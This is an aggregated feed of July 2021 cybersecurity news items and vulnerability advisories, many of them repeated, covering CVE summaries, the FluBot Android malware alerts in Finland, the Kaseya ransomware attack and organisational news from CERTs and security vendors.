In June, the only rays of sunshine concerned data breaches and leaks. Otherwise, cyber weather was cloudy as usual. Even an alert had to be issued when Finnish mobile phones were bombarded with malware messages. We updated our statistics on cyber security phenomena and the top 5 cyber threats, which now include three new descriptions. Take a moment to enjoy our cyber weather package!

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-kesakuu-2021
Cyber weather in June: symptoms of a "cyber snuffle" and updated statistics
2021-07-22T10:16:46Z | 1626949006

In June, the only rays of sunshine concerned data breaches and leaks. Otherwise, cyber weather was cloudy as usual. Even an alert had to be issued when Finnish mobile phones were bombarded with malware messages. We updated our statistics on cyber security phenomena and the top 5 cyber threats, which now include three new descriptions. Take a moment to enjoy our cyber weather package!

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-kesakuu-2021
CERT-FI 20 years: Computer worm Conficker changed the world
2021-07-22T10:01:17Z | 1626948077

In 2008, the Conficker computer worm wreaked havoc across the world. It reached Finland in early 2009 and caused Autoreporter notifications to skyrocket. Conficker could spread on the internet and in companies’ internal networks, infect USB mass storage devices and update itself. Looking back on this dormant threat is Thomas Grenman, principal security consultant at Telia Cygate, who was in 2009 tracking the worm as a duty officer at CERT-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-computer-worm-conficker-changed-world
CERT-FI 20 years: Computer worm Conficker changed the world
2021-07-22T10:01:17Z | 1626948077

In 2008, the Conficker computer worm wreaked havoc across the world. It reached Finland in early 2009 and caused Autoreporter notifications to skyrocket. Conficker could spread on the internet and in companies’ internal networks, infect USB mass storage devices and update itself. Looking back on this dormant threat is Thomas Grenman, principal security consultant at Telia Cygate, who was in 2009 tracking the worm as a duty officer at CERT-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-computer-worm-conficker-changed-world
Guest writer: Adult support needed to ensure children are safe online
2021-07-22T09:54:40Z | 1626947680

How to teach children to navigate safely in the virtual world? Our guest writer Katariina Leivo, developmental psychology specialist at Protect Children, gives expert advice. The column is connected to the Online Road Safety project led by Protect Children. The Finnish Transport and Communications Agency Traficom also participates in the project.

https://www.kyberturvallisuuskeskus.fi/en/news/guest-writer-adult-support-needed-ensure-children-are-safe-online
Guest writer: Adult support needed to ensure children are safe online
2021-07-22T09:54:40Z | 1626947680

How to teach children to navigate safely in the virtual world? Our guest writer Katariina Leivo, developmental psychology specialist at Protect Children, gives expert advice. The column is connected to the Online Road Safety project led by Protect Children. The Finnish Transport and Communications Agency Traficom also participates in the project.

https://www.kyberturvallisuuskeskus.fi/en/news/guest-writer-adult-support-needed-ensure-children-are-safe-online
Security Alert (A21-07-14): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-07-22T04:00:00Z | 1626926400

Apple has released iOS 14.7 and iPadOS 14.7 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Summarizes Service Disruption (RESOLVED)
2021-07-22T04:00:00Z | 1626926400

At 15:45 UTC on July 22, 2021, a software configuration update triggered a bug in our Secure Edge Content Delivery Network impacting that network's domain name service (DNS) system (the system that directs browsers to websites for that specific service). This caused a disruption impacting availability of some customer websites. The disruption lasted up to an hour. Upon rolling back the software configuration update, the services resumed normal operations.

https://www.akamai.com/blog/news/akamai-summarizes-service-disruption-resolved
CVE-2021-33527
2021-07-22T00:00:00Z | 1626912000

CWE-78: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND: A low privileged local attacker can send a command to the service running with NT AUTHORITY\SYSTEM, that will not correctly validate the input, instructing it to execute arbitrary code execution with the privileges of the service. Read more: "All Roads Lead to OpenVPN: Pwning Industrial Remote Access Clients"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33527
CVE-2021-33526
2021-07-22T00:00:00Z | 1626912000

CWE-269 IMPROPER PRIVILEGE MANAGMENT: A low privileged local attacker can send a command to the service running with NT AUTHORITY\SYSTEM instructing it to execute a malicous OpenVPN configuration resulting in arbitrary code execution with the privileges of the service. Read more: "All Roads Lead to OpenVPN: Pwning Industrial Remote Access Clients"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33526
Security Alert (A21-07-11): Multiple vulnerabilities in Google Chrome
2021-07-21T04:00:00Z | 1626840000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-07-12): Multiple Vulnerabilities in Oracle Java and Oracle Products (July 2021)
2021-07-21T04:00:00Z | 1626840000

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-07-13): Multiple Vulnerabilities in Linux Operating Systems
2021-07-21T04:00:00Z | 1626840000

Multiple vulnerabilities were found in major Linux distributions including Debian, RedHat, SUSE and Ubuntu.

https://www.govcert.gov.hk/en/alerts_detail.php
Riigiportaalis olid kättesaadavad üle 300 000 inimese andmed
2021-07-20T10:08:26Z | 1626775706

9. juulil sulges riigi infosüsteemi amet (RIA) riigiportaalis eesti.ee ettevõtjatele mõeldud iseteeninduskeskkonnas olnud andmebaasi, kus oli 336 733 inimese ees- ja perekonnanimi, isikukood, töökoht ning osa puhul seos eelnevate ametikohtadega. Andmebaasile oli võimalik ligi pääseda ainult nendel inimestel, kelle andmed olid andmebaasis.

https://ria.ee/uudised/riigiportaalis-olid-kattesaadavad-ule-300-000-inimese-andmed
The New Shadow IT: How Will You Defend Against Threats from Amazon Sidewalk and Other “Unknown Unknowns” on Your Network?
2021-07-20T08:50:04Z | 1626771004

Amazon has recently enabled Sidewalk on its devices, raising security and privacy concerns for consumers. But those devices also lurk in many enterprise networks. How can your organization protect itself from these unknown threats? Security discussions usually revolve around known or perceived threats – ransomware, phishing, social engineering — and which security practices can address... The post The New Shadow IT: How Will You Defend Against Threats from Amazon Sidewalk and Other “Unknown Unknowns” on Your Network? appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-new-shadow-it-how-will-you-defend-against-threats-from-amazon-sidewalk-and-other-unknown-unknowns-on-your-network/
High Threat Security Alert (A21-07-10): Vulnerability in Microsoft Edge (Chromium-based)
2021-07-20T04:00:00Z | 1626753600

Microsoft released a security update to address a vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Zero Trust Network Access Is an Oxymoron
2021-07-20T04:00:00Z | 1626753600

Though Zero Trust is really quite simple and should be viewed as a very strong form of the age-old principle of least privilege, that does not mean that it is the same thing. In fact, one of the most significant differences from what came before is that when it comes to access, Zero Trust is based on application access, not network access. I was surprised, then, when Gartner's new SASE (secure access service edge) model included something called Zero Trust Network Access (ZTNA). This term is an oxymoron, and I make this point because it matters. The distinction between network access and application access is important.

https://www.akamai.com/blog/security/zero-trust-network-access-is-an-oxymoron
Single Pass Cloud Engine: The Key to Unlocking the True Value of SASE
2021-07-19T10:57:52Z | 1626692272

The post Single Pass Cloud Engine: The Key to Unlocking the True Value of SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/single-pass-cloud-engine-the-key-to-unlocking-the-true-value-of-sase/
UK and allies hold Chinese state responsible for pervasive pattern of hacking
2021-07-19T10:45:03Z | 1626691503

Chinese state-backed actors were responsible for gaining access to computer networks around the world via Microsoft Exchange servers.

https://www.ncsc.gov.uk/news/uk-allies-hold-chinese-state-responsible-for-pervasive-pattern-of-hacking
RIS infokiri – juuli 2021
2021-07-19T07:48:17Z | 1626680897

Infokirjas on juttu biomeetria kasutamisest e-hääletusel, ID-kaardi tehnilisest kasutajatoest, RIA IT peaarhitektist, EL COVID tõendi loomisest, riigiportaali uuendustest, Islandi liitumisest X-Roadi kogukonnaga, Bürokratist ja RIA küberturvalisuse teenistuse uuest juhist.

https://ria.ee/uudised/ris-infokiri-juuli-2021
Ongoing campaign leveraging Exchange vulnerability potentially linked to Iran
2021-07-19T00:00:00Z | 1626652800

https://www.first.org/blog/20210719-Ongoing_campaign_leveraging_Exchange_vulnerability_potentially_linked_to_Iran
Ongoing campaign leveraging Exchange vulnerability potentially linked to Iran
2021-07-19T00:00:00Z | 1626652800

https://www.first.org/blog/20210719-Ongoing_campaign_leveraging_Exchange_vulnerability_potentially_linked_to_Iran
Single Pass Cloud Engine (SPACE): The Key to Unlocking the True Value of SASE
2021-07-18T06:52:55Z | 1626591175

When Gartner introduced Secure Access Service Edge (SASE) in 2019, it caught the market by surprise. Unlike many advancements in technology, SASE wasn’t a new networking capability, or an answer to an unsolved security mystery. Rather, it was addressing a mundane, yet business-critical question: how can IT support the business with the expected security, performance,... The post Single Pass Cloud Engine (SPACE): The Key to Unlocking the True Value of SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/single-pass-cloud-engine-space-the-key-to-unlocking-the-true-value-of-sase/
Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2
2021-07-18T00:00:00Z | 1626566400

Combining part 1's information leak vulnerability with a pool overflow vulnerability to obtain code execution via grooming the kLFH

/swimming-in-the-kernel-pool-part-2/
High Threat Security Alert (A21-07-09): Multiple vulnerabilities in Google Chrome
2021-07-16T04:00:00Z | 1626408000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
OpenSSL CVE-2021-3449 and CVE-2021-3450 vulnerabilities affected certain SonicWall Products
2021-07-15T21:07:06Z | 1626383226

Certain SonicWall products (highlighted below) are affected by the OpenSSL CVE-2021-3449 and CVE-2021-3450 vulnerability.  Product Affected Version(s) SMA100 10.2.0.x SonicOS(Gen7) 7.0.1 Capture Client Cc 3.5 Email Security (On-Prem) ES 10.0.9 CVE: CVE-2021-3449, CVE-2021-3450 Last updated: Oct. 24, 2021, 9:07 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013
Cursos CERT.br: Inscrições 2021 Abertas
2021-07-15T11:30:00Z | 1626348600

Abertas as inscrições das turmas 2021 do curso Fundamentals of Incident Handling (FIH): https://cert.br/cursos/inscricao/ Valor: R$ 3.000,00 Local: Sede do NIC.br, São Paulo, SP As turmas oferecidas serão nas seguintes datas: Turma 1: 25 a 29 de outubro de 2021 Turma 2: 22 a 26 de novembro de 2021

https://cert.br/cursos/inscricao/
Severe alert on Android malware reactivated
2021-07-15T10:05:24Z | 1626343524

The FluBot campaign sending scam messages became active in Finland in June and is still causing trouble. Based on reports received by the National Cyber Security Center (NCSC-FI), scam text messages written in Finnish are being sent to thousands of people in Finland each week. Earlier this summer, the messages concerned package deliveries, but now they have a new voicemail theme: “You have 1 new voicemail.”

https://www.kyberturvallisuuskeskus.fi/en/Varoitus_TTN_0713
Severe alert on Android malware reactivated
2021-07-15T10:05:24Z | 1626343524

The FluBot campaign sending scam messages became active in Finland in June and is still causing trouble. Based on reports received by the National Cyber Security Center (NCSC-FI), scam text messages written in Finnish are being sent to thousands of people in Finland each week. Earlier this summer, the messages concerned package deliveries, but now they have a new voicemail theme: “You have 1 new voicemail.”

https://www.kyberturvallisuuskeskus.fi/en/Varoitus_TTN_0713
Clarity in cookie practices – draft guidelines out for comment
2021-07-15T09:45:43Z | 1626342343

According to law, providers of electronic services must request user consent to the use of non-essential cookies. The Finnish Transport and Communications Agency Traficom has prepared guidelines on how to use cookies and other similar technologies in compliance with the law. The draft guidelines have now been published for comments before finalisation. Comments can be sent via the lausuntopalvelu.fi website until 9 August 2021:

https://www.kyberturvallisuuskeskus.fi/en/news/clarity-cookie-practices-draft-guidelines-out-comment
Clarity in cookie practices – draft guidelines out for comment
2021-07-15T09:45:43Z | 1626342343

According to law, providers of electronic services must request user consent to the use of non-essential cookies. The Finnish Transport and Communications Agency Traficom has prepared guidelines on how to use cookies and other similar technologies in compliance with the law. The draft guidelines have now been published for comments before finalisation. Comments can be sent via the lausuntopalvelu.fi website until 9 August 2021:

https://www.kyberturvallisuuskeskus.fi/en/news/clarity-cookie-practices-draft-guidelines-out-comment
Top 7 Use Cases for SASE
2021-07-15T09:19:46Z | 1626340786

The post Top 7 Use Cases for SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-top-7-use-cases-for-sase/
Kaseya Supply Chain Ransomware Attack
2021-07-15T04:00:00Z | 1626321600

On July 2, 2021, Kaseya disclosed an active attack against customers using its VSA product, and urged all on-premise customers to switch-off Kaseya VSA. Shortly before this alert, users on Reddit started describing ransomware incidents against managed security providers (MSPs), and the common thread among them was on-premise VSA deployments. In the hours to follow, several indicators of compromise (IOCs) were released, and Akamai was able to observe some of that traffic. A patch for the VSA product was released by Kaseya on July 11.

https://www.akamai.com/blog/security/kaseya-supply-chain-ransomware-attack
Zero Trust: Not As Scary As It Sounds
2021-07-15T04:00:00Z | 1626321600

If the term Zero Trust has been popping up in your news feed with astonishing frequency lately, you may be tempted to think that Zero Trust must be a brand-new technology cooked up in a research lab at MIT and powered by the latest artificial intelligence, machine learning, quantum computing, and a 1.21 gigawatt flux capacitor. In this and subsequent blog posts, I want to make the case that, in fact, Zero Trust is all about simplicity, and that at its core, Zero Trust is a strong form of the age-old principle of least privilege.

https://www.akamai.com/blog/security/zero-trust-network-access-not-as-scary-as-it-sounds
D-LINK DIR-3040 Syslog information disclosure vulnerability
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
D-LINK DIR-3040 Syslog information disclosure vulnerability
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1283
Advantech R-SeeNet ssh_form.php Reflected XSS vulnerability
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
Advantech R-SeeNet device_graph_page.php Multiple Reflected XSS vulnerabilities
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
Advantech R-SeeNet options.php local file inclusion (LFI) vulnerability
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1273
Advantech R-SeeNet ping.php OS Command Injection vulnerability
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
Advantech R-SeeNet telnet_form.php Reflected XSS vulnerability
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
D-LINK DIR-3040 Zebra IP routing manager information disclosure vulnerability
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1282
D-LINK DIR-3040 Libcli test environment hard-coded password vulnerability
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1285
D-LINK DIR-3040 Libcli command injection vulnerability
2021-07-15T00:00:00Z | 1626307200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1284
Valimisteenistus: Biomeetria rakendamine e-hääletamisel vajab pikemaajalist testimist
2021-07-14T21:06:00Z | 1626296760

Riigi infosüsteemi amet (RIA) on tellinud analüüsi biomeetria rakendamise kohta e-hääletamisel. Uuring tõdeb, et näotuvastuse lisamine valimistele on teostatav, kuid privaatsusriive ja tehnoloogilise keerukuse tõusuga lisanduvad riskid, mis ei pruugi praegu kaaluda üles sellest saadavat kasu.

https://ria.ee/uudised/valimisteenistus-biomeetria-rakendamine-e-haaletamisel-vajab-pikemaajalist-testimist
High Threat Security Alert (A21-07-04): Multiple Vulnerabilities in Microsoft Products (July 2021)
2021-07-14T04:00:00Z | 1626235200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-07-05): Multiple Vulnerabilities in Adobe Reader/Acrobat
2021-07-14T04:00:00Z | 1626235200

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-07-06): Multiple vulnerabilities in Firefox
2021-07-14T04:00:00Z | 1626235200

Mozilla has published the advisories (MFSA2021-28 and MFSA2021-29) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-07-07): Multiple vulnerabilities in VMware Products
2021-07-14T04:00:00Z | 1626235200

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-07-08): Multiple Vulnerabilities in Apache Tomcat
2021-07-14T04:00:00Z | 1626235200

Apache Software Foundation has released a security advisory to address multiple vulnerabilities in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Location-and Device-agnostic Security for the Mobile Workforce
2021-07-14T04:00:00Z | 1626235200

I've spent my entire career in technology and can still recall the time when a desktop PC was the only way to work. (Truth be told, I'm also old enough to remember dumb terminals.) I also remember my first company laptop -- a beast of a thing with a monochrome display so thick it came with an integrated 2.5" floppy drive and a battery life that made it barely usable. My first mobile phone was a Motorola Timeport, the first tri-band mobile phone that could work in Europe and North America.

https://www.akamai.com/blog/performance/location-and-device-agnostic-security-for-the-mobile-workforce
Streaming Numbers Jump for European Football Tournament Delivered by Akamai
2021-07-14T04:00:00Z | 1626235200

The video streaming traffic that Akamai delivered for more than 30 rights-holding customers during the July 11 Italy-England football (soccer) final as part of the delayed-to-2021European soccer tournament peaked at 34.9 Tbps on the Akamai edge platform. The traffic peak during the final match was the highest that Akamai reached for the tournament and was nearly 5x greater than the 7.3 Tbps peak of the 2016 Portugal-France championship match. Traffic during the June 29, 2021, round-of-16 match between Germany and England was the second-highest peak for the tournament, reaching 33.9 Tbps; third-highest was the July 6 Italy-Spain semi-final at 32.6 Tbps.

https://www.akamai.com/blog/performance/streaming-numbers-jump-for-european-football-tournament-delivered
CVE-2021-31893
2021-07-14T00:00:00Z | 1626220800

CWE-120 BUFFER COPY WITHOUT CHECKING SIZE OF INPUT: Classic buffer overflow. A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the "classic" case in which the program copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections.

https://claroty.com/team82/disclosure-dashboard/cve-2021-31893
Improper Neutralization of Special Elements used in an SQL Command leading to SQL Injection vulnerability Impacting End-Of-Life SRA Appliances
2021-07-13T22:08:59Z | 1626214139

SonicWall is aware of improper neutralization of a SQL Command leading to SQL Injection vulnerability, reported by CrowdStrike, impacting end-of-life Secure Remote Access (SRA) products, specifically the SRA appliances running all 8.x firmware or an old version of firmware 9.x (9.0.0.9-26sv or earlier). In February 2021, SonicWall released SMA firmware 10.2.0.7 and 9.0.0.10 to fix a zero-day vulnerability, along with additional comprehensive code-strengthening. This strengthening proactively prevented this newly reported vulnerability in 9.0.0.10.Organizations that already upgraded to the 9.0.0.10 firmware are already protected against this newly reported issue and don’t need to take any action.Organizations with any 10.x version is not subject to this vulnerability as the vulnerable feature was deprecated in the 10.x release.Organizations running any firmware versions of 8.x or older than 9.0.0.10 or 10.2.0.7 should, per our earlier instructions, upgrade immediately. These older versions may potentially be exploited if not patched immediately.SMA 1000 Series products are not affected by this vulnerability.  CVE: CVE-2021-20028 Last updated: Aug. 4, 2021, 8:09 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0017
Joint statement from Ofcom and the National Cyber Security Centre
2021-07-13T15:12:55Z | 1626189175

A public statement from the the NCSC and Ofcom on how they will work together under the new Telecommunications (Security) Bill, currently in passage.

https://www.ncsc.gov.uk/news/ncsc-ofcom-statement
5 Steps to Prepare for SASE Adoption
2021-07-13T09:20:55Z | 1626168055

Corporate environments are evolving quickly, and the recent shift towards remote and hybrid work models due to COVID-19 is just the most obvious example of this. The modern enterprise network looks very different from that of even ten years ago, and security is playing catch-up. Secure Access Service Edge (SASE) offers security designed for the... The post 5 Steps to Prepare for SASE Adoption appeared first on Cato Networks.

https://www.catonetworks.com/blog/5-steps-to-prepare-for-sase-adoption/
Zero Trust: The Protection Model for the Post-Pandemic World
2021-07-13T04:00:00Z | 1626148800

One year and a half following the start of the COVID-19 pandemic, we're seeing most companies either maintaining their remote work policies or slowly moving to a hybrid model. In fact, an estimated 36.2 million Americans will be working remotely by 2025, which is nearly double pre-pandemic levels.

https://www.akamai.com/blog/security/zero-trust-the-protection-model-for-the-post-pandemic-world
Mind the Gap: Securely Embracing the Digital Explosion
2021-07-13T04:00:00Z | 1626148800

State and local governments are weathering a digital explosion. The move to "virtual everything" means that greater amounts of information are being produced and transmitted electronically, but the digital infrastructure powering these operations is straining under the weight.

https://www.akamai.com/blog/security/mind-the-gap-securely-embracing-the-digital-explosion
CVE-2021-22777
2021-07-13T00:00:00Z | 1626134400

CWE-502: Deserialization of Untrusted Data vulnerability exists that could cause code execution by opening a malicious project file.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22777
ID-kaardi tarkvara uus versioon muudab DDOC-allkirjade staatust
2021-07-12T21:00:00Z | 1626123600

Riigi infosüsteemi amet avaldas 13. juulil ID-tarkvara uue versiooni 2021.06, mis lisab DDOC-vormingus dokumendi allkirjade kehtivusele hoiatuse.

https://ria.ee/uudised/id-kaardi-tarkvara-uus-versioon-muudab-ddoc-allkirjade-staatust
Aprovado o Polo de Inovação Digital C-Hub
2021-07-12T00:00:00Z | 1626048000

Foi através do Despacho n. 6269/2021, de 25 de junho, que foram reconhecidos os Polos de Inovação Digital para integração na Rede Nacional de Digital Innovation Hubs.No âmbito do Plano de Ação para a Transição Digital, foi aprovada a medida nº 8, Digital Innovation Hubs para o Empreendedorismo, incluída no Pilar II — Transformação digital do tecido empresarial, que qual visa a dinamização de uma Rede Nacional de Digital Innovation Hubs, a desenvolver em ligação com os clusters de competitividade e centros de interface tecnológico reconhecidos. A rede em causa estará interligada com a Rede Europeia de Digital Innovation Hubs, de forma a dinamizar pela Comissão Europeia, no âmbito dos programas quadro europeus para 2021-2027.Recorde-se que o reconhecimento do Polo C-Hub: Cybersecurity DIH resultou de um processo concorrencial para a aprovação e reconhecimento de 10 Polos de Inovação Digital em Portugal, tendo a candidatura número 22 apresentado a concurso o consórcio liderado pelo Centro Nacional de Cibersegurança, integrando a AMA - Agência para a Modernização Administrativa, o C3P - Centro de Competências em Cibersegurança e Privacidade da Universidade do Porto, o INOV - Instituto de Engenharia de Sistemas e Computadores Inovação e o TICE.PT - Pólo das Tecnologias de Informação, Comunicação e Electrónica. O objetivo do Polo C-Hub: Cybersecurity DIH passa por apoiar a transição digital de Portugal e da Europa, visando a cibersegurança nas empresas e na Administração Pública.

https://dyn.cncs.gov.pt/pt/detalhe/art/135566/aprovado-o-polo-de-inovacao-digital-c-hub
Industry Peers Are the Path Towards a Collective Defense
2021-07-12T00:00:00Z | 1626048000

https://www.first.org/blog/20210712-Industry_Peers_Are_the_Path_Towards_a_Collective_Defense
Industry Peers Are the Path Towards a Collective Defense
2021-07-12T00:00:00Z | 1626048000

https://www.first.org/blog/20210712-Industry_Peers_Are_the_Path_Towards_a_Collective_Defense
[Ep.3] From Disinformation to Deepfake
2021-07-11T08:47:45Z | 1625993265

The post [Ep.3] From Disinformation to Deepfake appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-81
Alert on Android malware removed
2021-07-09T14:28:00Z | 1625840880

We have removed the alert on Android malware issued on 4 June. The malware campaign that was highly active in early June has now calmed down, and the number of incident reports about text messages spreading the malware has decreased significantly.

https://www.kyberturvallisuuskeskus.fi/en/news/alert-android-malware-removed
Alert on Android malware removed
2021-07-09T14:28:00Z | 1625840880

We have removed the alert on Android malware issued on 4 June. The malware campaign that was highly active in early June has now calmed down, and the number of incident reports about text messages spreading the malware has decreased significantly.

https://www.kyberturvallisuuskeskus.fi/en/news/alert-android-malware-removed
CERT-FI 20 years: International cooperation provided a spark and sound basis for a career in information security
2021-07-09T14:14:50Z | 1625840090

CERT-FI has been at the centre of the information security sector from the start. International cooperation and international cybercrime were part of information security work already 20 years ago. Many present-day information security experts gained valuable experience in CERT-FI’s cross-border activities. In this article, Erka Koivunen, chief information security officer at F-Secure, and Harri Bryk, head of cyber security at Euroclear Finland, talk about the lessons they learned at CERT-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-international-cooperation-provided-spark-and-sound-basis-career-information
CERT-FI 20 years: International cooperation provided a spark and sound basis for a career in information security
2021-07-09T14:14:50Z | 1625840090

CERT-FI has been at the centre of the information security sector from the start. International cooperation and international cybercrime were part of information security work already 20 years ago. Many present-day information security experts gained valuable experience in CERT-FI’s cross-border activities. In this article, Erka Koivunen, chief information security officer at F-Secure, and Harri Bryk, head of cyber security at Euroclear Finland, talk about the lessons they learned at CERT-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-international-cooperation-provided-spark-and-sound-basis-career-information
Planning plays a key role in successful cyber exercises
2021-07-09T14:05:35Z | 1625839535

Markus Lassheikki, Jyri Valmu and Lauri Kulonen, secretaries for the food supply pool at the National Emergency Supply Agency of Finland, act as observers in the cyber exercise of the food-sector information sharing group at the National Cyber Security Centre. Drawing on their vast experience in security of supply, they examine the benefits of cyber exercises for the information sharing groups and a wider range of organisations.

https://www.kyberturvallisuuskeskus.fi/en/news/planning-plays-key-role-successful-cyber-exercises
Planning plays a key role in successful cyber exercises
2021-07-09T14:05:35Z | 1625839535

Markus Lassheikki, Jyri Valmu and Lauri Kulonen, secretaries for the food supply pool at the National Emergency Supply Agency of Finland, act as observers in the cyber exercise of the food-sector information sharing group at the National Cyber Security Centre. Drawing on their vast experience in security of supply, they examine the benefits of cyber exercises for the information sharing groups and a wider range of organisations.

https://www.kyberturvallisuuskeskus.fi/en/news/planning-plays-key-role-successful-cyber-exercises
CERT-FI 20 years: Laying the foundations for information security in Finland
2021-07-09T13:52:40Z | 1625838760

It is time for a small pre-party to prepare for the celebration of the upcoming 20th anniversary of our CERT-FI operations at the turn of the year. Working to ensure information security in Finland, the Finnish Computer Emergency Response Team has reached the age of a young adult. Our current Coordination Centre, incident response activities and expertise in information security matters have their origins in the CERT-FI function. Our nostalgic series of articles will take us back in time, highlighting moments along CERT-FI's journey from 2001 to today. In the first article, the Timo Lehtimäki, Jani Arnell and Kauto Huopio look back on the early years of CERT-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-laying-foundations-information-security-finland
CERT-FI 20 years: Laying the foundations for information security in Finland
2021-07-09T13:52:40Z | 1625838760

It is time for a small pre-party to prepare for the celebration of the upcoming 20th anniversary of our CERT-FI operations at the turn of the year. Working to ensure information security in Finland, the Finnish Computer Emergency Response Team has reached the age of a young adult. Our current Coordination Centre, incident response activities and expertise in information security matters have their origins in the CERT-FI function. Our nostalgic series of articles will take us back in time, highlighting moments along CERT-FI's journey from 2001 to today. In the first article, the Timo Lehtimäki, Jani Arnell and Kauto Huopio look back on the early years of CERT-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-laying-foundations-information-security-finland
SonicWall Switch LLDP Protocol multiple Out-of-Bound read vulnerability
2021-07-08T17:07:12Z | 1625764032

Multiple Out-of-Bound read vulnerability in SonicWall Switch when handling LLDP Protocol allows an attacker to cause a system instability or potentially read sensitive information from the memory locations. CVE: CVE-2021-20024 Last updated: July 8, 2021, 5:07 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0011
Voordelen met Secure Access Service Edge (SASE)
2021-07-08T11:42:00Z | 1625744520

The post Voordelen met Secure Access Service Edge (SASE) appeared first on Cato Networks.

https://www.catonetworks.com/resources/voordelen-met-secure-access-service-edge-sase/
Business Continuity Planning in the Cloud and Mobile Era: Are You Prepared?
2021-07-08T11:41:54Z | 1625744514

The post Business Continuity Planning in the Cloud and Mobile Era: Are You Prepared? appeared first on Cato Networks.

https://www.catonetworks.com/resources/business-continuity-planning-in-the-cloud-and-mobile-era-are-you-prepared/
test
2021-07-08T11:40:00Z | 1625744400

test Read more

https://www.virusbulletin.com/resources/test/
Security Alert (A21-07-02): Multiple Vulnerabilities in Cisco Products
2021-07-08T04:00:00Z | 1625716800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-07-03): Multiple Vulnerabilities in Android
2021-07-08T04:00:00Z | 1625716800

Google has released Android Security Bulletin July 2021 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Helps Q-dance Bring Its Tribe to Defqon.1 at Home -- a Global Virtual Festival Experience
2021-07-08T04:00:00Z | 1625716800

Every year, Q-dance (part of the ID&T group), a Dutch electronic music experience company, delights its die-hard fans (or their "tribe") at the world's largest hardstyle festival, Defqon.1. Helicopters, simulated earthquakes, special moments like Power Hour, and amazing shows make up the unique experience.

https://www.akamai.com/blog/performance/akamai-helps-q-dance-bring-its-tribe-to-defqon-1-at-home-a-glance
FIRST POST: June - August 2021
2021-07-08T00:00:00Z | 1625702400

Did you miss our Virtual 33rd FIRST Annual Conference?; ICASI integrates into FIRST PSIRT SIG, bolstering the incident response and security team industry; FIRST Welcomes a new Chair and Five New Board of Directors; FIRST publishes its fifth Annual Reportt; A new fellowship team joins FIRST - Malawi CERT; Jeffrey Carpenter and Dan Kaminsky newly inducted into FIRST’s Incident Response Hall of Fame; FIRST membership continues to grow - we’re now at 575 members from 98 countries.

https://www.first.org/newsroom/newsletters/FIRST_POST_Jun2021.pdf
FIRST appoints new Chair Dave Schwartzburg and welcomes five new Board of Directors
2021-07-08T00:00:00Z | 1625702400

Alexander Jäger, Senior Security Engineer of Google, continues in his role as Chief Financial Officer

https://www.first.org/newsroom/releases/20210708
FIRST appoints new Chair Dave Schwartzburg and welcomes five new Board of Directors
2021-07-08T00:00:00Z | 1625702400

